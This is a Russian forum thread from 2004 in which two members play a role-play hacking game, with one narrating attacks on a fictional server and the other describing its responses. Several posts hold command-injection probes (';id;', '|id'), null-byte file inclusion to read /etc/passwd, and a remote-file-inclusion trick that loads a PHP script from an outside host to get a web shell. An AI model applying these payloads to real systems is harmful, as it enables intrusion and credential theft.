IPB Style© Fisana

Перейти к содержимому


Фотография

Дип-гейм-2: компьютер в комнате у Shellaur


  • Закрытая тема Тема закрыта
Сообщений в теме: 44

#1 jaros

jaros

    всё бред

  • Путники
  • PipPipPipPipPipPip
  • 1 580 сообщений

Отправлено 13:04:10 - 27.11.2004

Здесь идёт обсуждение между мной и Shellaur о том, как он выполняет своё секретное задание. Я сделал это общедоступной темой, потому что другим может быть интересно читать, что происходит.

ЭТО ЧАСТЬ ИГРЫ "ДИП-ГЕЙМ-2". ПРОЧИТАТЬ ПРАВИЛА И ПРИСОЕДИНИТЬСЯ К ИГРЕ ВЫ МОЖЕТЕ В ДРУГОЙ ТЕМЕ.

Прошу также всех, кто не участвует в игре, не постить в этой теме, чтобы была видна нить повествования.
  • 0

#2 Shellaur

Shellaur

    Freeman

  • Путники
  • PipPipPipPipPipPip
  • 1 095 сообщений

Отправлено 04:00:40 - 28.11.2004

----------
Так, так, jaros, сожно поподробнее - я дожен стырить *sql базу данных под названием Users, или фойл /etc/passwd с аккунтами пользователей сервера
  • 0

#3 jaros

jaros

    всё бред

  • Путники
  • PipPipPipPipPipPip
  • 1 580 сообщений

Отправлено 21:35:45 - 28.11.2004

Одну таблицу users из базы данных SQL (название базы тебе неизвестно). Можешь вместо этого стырить и /etc/passwd и попытаться сбагрить это заказчику. Посмотрим, как он на это отреагирует.

ПС. Ту информацию, которую ты хочешь делать секретной, надо посылать PM-ом мне, а не класть в общем доступе. Можно считать теперь, что твоё задание теперь не секретное.
  • 0

#4 Shellaur

Shellaur

    Freeman

  • Путники
  • PipPipPipPipPipPip
  • 1 095 сообщений

Отправлено 17:46:10 - 30.11.2004

Так, погоди, я только уточная, че как.
Скажи еще, какова будет система взлома.
Типа - я говорю, куда захожу, ты говоришь, что я вижу?
  • 0

#5 jaros

jaros

    всё бред

  • Путники
  • PipPipPipPipPipPip
  • 1 580 сообщений

Отправлено 21:30:04 - 30.11.2004

Да. Правда, в зависимости от того, что ты скажешь. Пока ты ещё не в глубине и поэтому воспринимаешь мир, как обычно. То есть перед тобой экран компьютера, а не таинственный коридор, ведущий внутрь сервера. Весь взлом надо проводить осознанно, то есть комментируя, что ты делаешь в реале, а не как это выглядит в дипе. На самом деле, для взлома дип не нужен совсем.

Так что насчёт "куда захожу" — я бы скорее сказал "что набираю на клавиатуре".
  • 0

#6 jaros

jaros

    всё бред

  • Путники
  • PipPipPipPipPipPip
  • 1 580 сообщений

Отправлено 15:06:16 - 04.12.2004

Уф. Всё в порядке.

Shellaur: Продолжим?
  • 0

#7 Shellaur

Shellaur

    Freeman

  • Путники
  • PipPipPipPipPipPip
  • 1 095 сообщений

Отправлено 05:22:19 - 05.12.2004

to jaros
Ты так и не ответил, запросы типа "поставляю в Query_String значение ;id;"
сендить тебе ПМом, или постить прямо тут?
  • 0

#8 jaros

jaros

    всё бред

  • Путники
  • PipPipPipPipPipPip
  • 1 580 сообщений

Отправлено 16:40:46 - 05.12.2004

Лучше ПМ-ом.
  • 0

#9 Shellaur

Shellaur

    Freeman

  • Путники
  • PipPipPipPipPipPip
  • 1 095 сообщений

Отправлено 14:53:51 - 08.12.2004

ОК. Но что тогда будет ЗДЕСЬ??
  • 0

#10 jaros

jaros

    всё бред

  • Путники
  • PipPipPipPipPipPip
  • 1 580 сообщений

Отправлено 18:16:14 - 08.12.2004

Я изменил концепцию игры. Теперь нет секретных сообщений. Играем в открытую в этой теме.

index.php так и остается без параметров при брожении по сайту?
Перловый форум висит на этом не серваке?

Нет, у index.php появляются параметры типа "action=Admin" и "action=Downloads". Параметры всё время начинаются с "action=...", других параметров ты не видел.

Форум работает на том же сервере.
  • 0

#11 Shellaur

Shellaur

    Freeman

  • Путники
  • PipPipPipPipPipPip
  • 1 095 сообщений

Отправлено 08:09:57 - 09.12.2004

прообую подставить вместо значения action следуюсчие параметры:
|id
id|
|id|
;id;
/etc/passwd

Изучаю результат каждого запроса
  • 0

#12 jaros

jaros

    всё бред

  • Путники
  • PipPipPipPipPipPip
  • 1 580 сообщений

Отправлено 20:02:21 - 09.12.2004

Безуспешно. Скрипт выдаёт:

Страница не может быть отображена
К ошибке прилагаются комментарии: Извините, такой страницы (/etc/passwd) не существует.

Хм, может я чего не понял, но это что, должно было сработать? :(
  • 0

#13 Shellaur

Shellaur

    Freeman

  • Путники
  • PipPipPipPipPipPip
  • 1 095 сообщений

Отправлено 12:46:49 - 10.12.2004

а запросы id| |id |id| ;id;
Где результат каждого из этих запросов?
зы. Знаешь иногда работает.
Один раз было вижу www.xxxxxxx.com/cgi-bin/mag.cgi?artid=fresh
Набираю: вижу www.xxxxxxx.com/cgi-bin/mag.cgi?artid=hana
ответ: hana.html не найден
набираю вижу www.xxxxxxx.com/cgi-bin/mag.cgi?artid=/etc/passwd
ответ: /etc/passwd/html не найден
набираю вижу www.xxxxxxx.com/cgi-bin/mag.cgi?artid=/etc/passwd%00
Опаньки. Файл усеров как на ладони. Притом с абсолютным путем,
без извращений типа ../../../../../../etc/passwd%00 .
Если инетресно, могу даже урл того скрипта дать (там 4 или 5 аккаунтов с шеллом)
  • 0

#14 Shellaur

Shellaur

    Freeman

  • Путники
  • PipPipPipPipPipPip
  • 1 095 сообщений

Отправлено 12:51:14 - 10.12.2004

А иногдабываеи еще тупее: в параметре скрипта бывает полное имя типа:
http://www.lohovsy_s...dyrka=file.html
ну, вместо файла добивается http://padlapass.narod.ru/buga.php , добавляется параметр cmd c никсовой командой,
и, если конфиг для php кривой то у нас есть веб-шелл
http://www.lohovsy_s.....&cmd=uname -a
  • 0

#15 jaros

jaros

    всё бред

  • Путники
  • PipPipPipPipPipPip
  • 1 580 сообщений

Отправлено 13:31:20 - 10.12.2004

Страница не может быть отображена
К ошибке прилагаются комментарии: Извините, такой страницы (id|) не существует.

Страница не может быть отображена
К ошибке прилагаются комментарии: Извините, такой страницы (|id) не существует.

Страница не может быть отображена
К ошибке прилагаются комментарии: Извините, такой страницы (|id|) не существует.

Страница не может быть отображена
К ошибке прилагаются комментарии: Извините, такой страницы (;id;) не существует.

Страница не может быть отображена
К ошибке прилагаются комментарии: Извините, такой страницы (/etc/passwd) не существует.

(Дело в том, что указывается не имя внешнего файла, который надо показать, а параметр скрипта, по которому он понимает, что надо отобразить. Все данные зашиты в самом скрипте и наружу он за подсказками не лазит.)
  • 0

#16 Shellaur

Shellaur

    Freeman

  • Путники
  • PipPipPipPipPipPip
  • 1 095 сообщений

Отправлено 14:26:21 - 10.12.2004

Если запрос ;id; успешно отфильтровался, значит он не использует функцию system() ?
Если отфильтровались запросы с пайпами, то это значит, что в скрипт вшит парсер, чего не может быть, судя по outputу сервера, значит форум написан на друго скриптовом языке
PS. Скрипт на php иногда даже принимая не имя файла, как аргумент, все рано успешно сожрет файл, если в конфиге явнг не запрещено указывать значение переменной метода GET файл с другого серванта
  • 0

#17 jaros

jaros

    всё бред

  • Путники
  • PipPipPipPipPipPip
  • 1 580 сообщений

Отправлено 14:45:10 - 10.12.2004

Мы об одном и том же PHP говорим? :ph34r: Да, скрипт действительно не использует функцию system () — она небезопасна. Причём тут парсер? Чего он парсить должен?
  • 0

#18 Shellaur

Shellaur

    Freeman

  • Путники
  • PipPipPipPipPipPip
  • 1 095 сообщений

Отправлено 14:54:23 - 10.12.2004

Тьфу ты. блин, аж стыдно стало. Твоя правда.
В смысле не парсер, а резалка опасных спецсимволов(/\|;, etc)
И вообще,вроде бы форум перловый, а бага с символом ; присуща обоим языкам, а вот пайпы ПХПом обрабатыватся безглючно.... эх.
доступ из скриптов, использующих метод GET, к какой-нибудь sql-базе есть?
  • 0

#19 jaros

jaros

    всё бред

  • Путники
  • PipPipPipPipPipPip
  • 1 580 сообщений

Отправлено 15:05:41 - 10.12.2004

Откуда ж тебе знать. Есть у тебя какой-нибудь способ скачать скрипт, чтобы пропрепарировать его?

Было бы странно, если бы таблица users совсем нигде не использовалась. Немного побродив по сайту, ты наткнулся на процедуру создания нового аккаунта в Лабиринте Смерти. Можешь заполнить анкету и стать полноценным пользователем игры. Только похоже, что форма работает по POSTу, а не по GETу.
  • 0

#20 Shellaur

Shellaur

    Freeman

  • Путники
  • PipPipPipPipPipPip
  • 1 095 сообщений

Отправлено 09:15:10 - 11.12.2004

Что значит "похоже". Если в Квери_Стринг содержит параметры, значит - метод ГЕТ. А расширение какое?
ЗЫ. Ты уже продумал, в каком месте будет дырка в сервере, или же просто импровизируешь?
  • 0


Количество пользователей, читающих эту тему: 1

0 пользователей, 1 гостей, 0 скрытых пользователей